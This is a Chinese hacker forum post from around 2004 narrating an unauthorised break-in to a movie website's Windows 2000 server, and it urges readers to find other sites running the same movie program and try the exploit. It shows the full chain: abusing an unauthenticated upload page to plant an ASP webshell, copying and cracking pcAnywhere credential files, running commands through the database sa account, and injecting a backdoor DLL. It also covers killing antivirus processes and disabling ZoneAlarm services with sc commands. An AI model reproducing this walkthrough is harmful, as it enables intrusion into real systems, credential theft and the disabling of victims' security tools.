|
一次比较困难的WIN2000渗透 |
|
|
这次渗透用到东西比较全面,写出来给大家参考,当中我走了不少弯路,粗心也有
漏洞:web程序漏洞。目标:获取管理员密码,并进入远程桌面
这里就不详细说这个web程序漏洞了,大家都知道的金梅电影程序uploadfilm.asp没过滤文件上传类型,并且不需要管理员认证!大家可以找找用金梅电影程序网站,试试这个漏洞,金梅4已经没有了。好了下面详细说说渗透过程
上传的asp木马是lcx的木马,红粉佳人(晕),木马的asp代码是加密的,这样可以躲过杀毒软件,嘿嘿
1,利用Serv-U 输入密码,看到了网站的全部文件,现在我得到了webshell第一件是就是看看他装的是什么ftpserver,在浏览器输入 ftp://www.domain.com 回显 serv-u 4.1 ready...什么的,嘿嘿,可能话可以用端口映射的方法获取admin,接着在asp木马输入net user,这里主要看看这个webshell有没有执行权限,很遗憾没有,端口映射得方法不能用!当然不会就这么放弃的
切换盘符: C盘 ,NTFS 做了权限不能浏览
浏览目录: c:\progra~1 回车,浏览c:\Program Files ,看到了可爱的Serv-U,虽然我知道99.9%ServUDaemon.ini里面的密码是加密的,但还要看看,汗````加密的,再看看能不能写,无权限,死心了!!!!
2,利用pcanywhere
返回免FSO页 浏览目录 C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 发送命令
看到了一个账号PCA.sx365.CIF
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywherePCA.sx365.CIF copy D:\wwwroot\wwwdomiancom\wwwroot\ 发送命令
显示命令成功
浏览器输入 htpp://www.domain.com/PCA.sx365.CIF down下来了,用流光看到了密码 嘿嘿
赶快打开pcanywhere连接肉鸡,奇怪是密码尽然错误的,事后我才知道他的pcanywhere密码不是放在C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 里的!晕到
3,绝对意外的发现 到此可以放弃了,想不到什么办法了,于是我就准备下载他的电影数据库,看看管理员账号,弄个账号看看电影,打开articleconn.asp 一看,乐死我了,他用的是sql版本的金梅,哈哈哈,居然用的sa账号,马上打开mssql连接器连接,晕倒,连不上端口过滤掉了,还好最新版的红粉佳人带了sql连接,只能再次返回免FSO页,输入sa 和密码,执行cmd命令 net user
\\ 的用户帐户
-------------------------------------------------------------------------------
...................
嘿嘿可以执行
上传后门把
传至服务器已有目录: D:\wwwroot\wwwdomiancom\wwwroot\ Inject.exe 上传成功
传至服务器已有目录: D:\wwwroot\wwwdomiancom\wwwroot\ TBack.DLL 上传成功
这个是hotmail老师的wineggdropshell,我用的是个人版的,发行版的可能会被杀
下面执行sql_cmd
copy D:\wwwroot\wwwdomiancom\wwwroot\Inject.exe c:\winnt\system32 已复制
copy D:\wwwroot\wwwdomiancom\wwwroot\TBack.DLL c:\winnt\system32 已复制
Inject.exe -run
Remote DLL Injector V1.9 Private Version By WinEggDrop
.......
安装成功
打开cmd telnet www.domain..com 21221 晕倒连不上.......
4,突破防火墙 后门连不上,第一感觉对方用了IP 安全机制(其实不是用的IP 安全机制),来试试反向连接的后门吧,安装hotmail老师的portless ,安装没问题,但反向连接也没用,这时我临机一动
sql_cmd
net stop serv-u
重新配置后门端口为21,安装完成后
telnet www.domain..com 21 连不上,到此我知道肉鸡用了防火墙,55555
net start 一大堆服务 看得头大
还是看进程吧 上传了Process.exe(查进程和杀进程的小程序)
Process.exe
看到了norton 和瑞星 ,这个简单用Process.exe kill掉,然而瑞星的一个rtscan.exe 死活杀不掉
帮你改名 ren 路径\rtscan.exe rtscan.exe.bak
上传reboot.exe
reboot.exe /r 服务器重起了
这下你死定了,telnet www.domain..com 21221 连不上,汗,防火墙+IP 安全机制
telnet www.domain..com 21 竟然还是连接不上
哦!norton的又启动了 kill 掉norton的进程
telnet www.domain..com 21 晕倒连接不上
Process.exe 已经没有任何防火墙的程序了,连病毒防火墙都没有`````
见鬼了````难倒遇到了硬件防火墙!!!!!!!pcanywhere的密码又不对,晕阿
5,zonealarm zonealarm一个超牛x的防火墙,再次Process.exe 我看到了 装在了 c:\winnt\system32\zonealarm
这个防火墙我不熟悉,问了一下hotmail老师得知安装成两个服务,一下是我和hotmail老师的对话
2004-02-20 04:18:25 阿新(Root)
我在农肉鸡
2004-02-20 04:36:20 WinEggDrop
又搞什么肉机了
2004-02-20 04:36:38 WinEggDrop
你看上眼的应该是"非一般"的肉机吧
2004-02-20 04:19:24 阿新(Root)
电影的
2004-02-20 04:25:03 阿新(Root)
我搞不定了
2004-02-20 04:25:36 阿新(Root)
我删掉它的serv-u
wineggdropshell 改成21端口 还是不行
2004-02-20 04:43:11 WinEggDrop
有防火墙
2004-02-20 04:53:42 WinEggDrop
应该是有norton防火墙
2004-02-20 04:54:12 WinEggDrop
得停了那东西
2004-02-20 04:37:33 阿新(Root)
55555
2004-02-20 04:55:13 WinEggDrop
上传个sc.exe
2004-02-20 04:55:16 WinEggDrop
看看有什么服务
2004-02-20 04:55:24 WinEggDrop
norton防火墙能停的
2004-02-20 04:55:36 WinEggDrop
我记得是两个服务的
2004-02-20 04:55:42 WinEggDrop
一个是exe的服务,一个是驱动
2004-02-20 04:40:33 阿新(Root)
你到我的服务器上来
2004-02-20 04:40:58 阿新(Root)
终端的
2004-02-20 04:41:33 阿新(Root)
等你呢
2004-02-20 04:59:31 WinEggDrop
进去了
2004-02-20 04:59:39 WinEggDrop
你控制我,还是我控制你
2004-02-20 04:42:24 阿新(Root)
你连接我
2004-02-20 05:01:26 WinEggDrop
不是norton防火墙
2004-02-20 04:44:10 阿新(Root)
是什么
2004-02-20 05:01:33 WinEggDrop
是zonealarm
2004-02-20 05:01:40 WinEggDrop
更强的防火墙,等一下
2004-02-20 04:44:29 阿新(Root)
[;P] 找到就好 哈哈哈
2004-02-20 05:01:54 WinEggDrop
net stop vsmon
2004-02-20 05:02:05 WinEggDrop
net stop vsdatant
2004-02-20 05:03:13 WinEggDrop
net stop vsdatant /y
2004-02-20 05:03:43 WinEggDrop
上传sc
2004-02-20 04:46:29 阿新(Root)
有了
2004-02-20 05:04:03 WinEggDrop
呵呵,想到什么法子
2004-02-20 04:47:01 阿新(Root)
没有啊 我说SC有了
2004-02-20 05:04:33 WinEggDrop
sc config vsmon disabled
2004-02-20 05:04:40 WinEggDrop
sc config vsdatant disabled
2004-02-20 05:05:14 WinEggDrop
sc config vsdatant start= disabled
2004-02-20 05:05:25 WinEggDrop
sc config vsmon start = disabled
2004-02-20 05:05:31 WinEggDrop
太旧没用sc了
2004-02-20 04:48:42 阿新(Root)
把他的程序名改掉
2004-02-20 05:06:49 WinEggDrop
命令多了个空格呀
2004-02-20 05:07:01 WinEggDrop
sc config vsmon start= disabled
2004-02-20 05:07:07 WinEggDrop
start后面没空格的
2004-02-20 04:49:57 阿新(Root)
好了 哈哈哈
2004-02-20 05:07:20 WinEggDrop
两个服务都搞了吗?
2004-02-20 04:50:03 阿新(Root)
是啊
2004-02-20 05:07:25 WinEggDrop
重启应该就可以了
2004-02-20 05:08:04 WinEggDrop
不用改名也行的了,服务都被禁止了,呵呵
2004-02-20 04:51:14 阿新(Root)
重启了 哈哈哈
这下好了
有剪接,到此服务器完全搞定,最后告诉大家他的pcanywhere密码文件是放在 c:\progra~\sys什么的目录里的就是pcanywhere的安装目录!
当中有遗漏,因为我不可能一边渗透一边记录,that's all
|
|
相关文章:九大数据库特点比较PHP与JSP运行速度之再比较Sql server中时间查询的一个比较快的语句常见数据库系统之比较 - Oracle数据库常见数据库系统之比较 - 数据库的发展和现状常见数据库系统之比较 - SYBASE 和 SQL SERVERPHP 与 ASP 比较用PHP连mysql和oracle数据库性能比较Dreamweaver和FrontPage比较,哪个好?相关软件: 文章中句子的处理与比较 C语言编缉器的比较 mymarket一个比较完善的PHP mymarket一个比较完善的PHP 一个比较简单的邮件列表程序,有订阅和退阅 红鸟自动链接,一套功能比较强大的自助友情 来自瓷都资讯的同学录系统,用户资料比较详 一个比较完整的源代码 定时提醒 1.0 一个功能比较完备的HTML文档编辑软件 这段代码演示将文件内容读入比较简单的方法 |
|